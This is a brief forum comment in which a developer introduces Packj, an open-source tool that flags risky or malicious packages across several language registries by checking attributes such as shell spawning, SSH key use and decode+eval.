|
|
|
|
|
|
by ashishbijlani
843 days ago
|
|
|
I’ve been building an open-source tool Packj [1] to detect publicly malicious, abandoned, typo-squatting, and other "risky" PyPI/NPM/Ruby/PHP/Maven/Rust packages. It carries out static/dynamic/metadata analysis and scans for 40+ attributes such as spawning of shell, use of SSH keys, network communication, use of decode+eval, etc. to flag risky packages. 1. https://github.com/ossillate-inc/packj |
|
|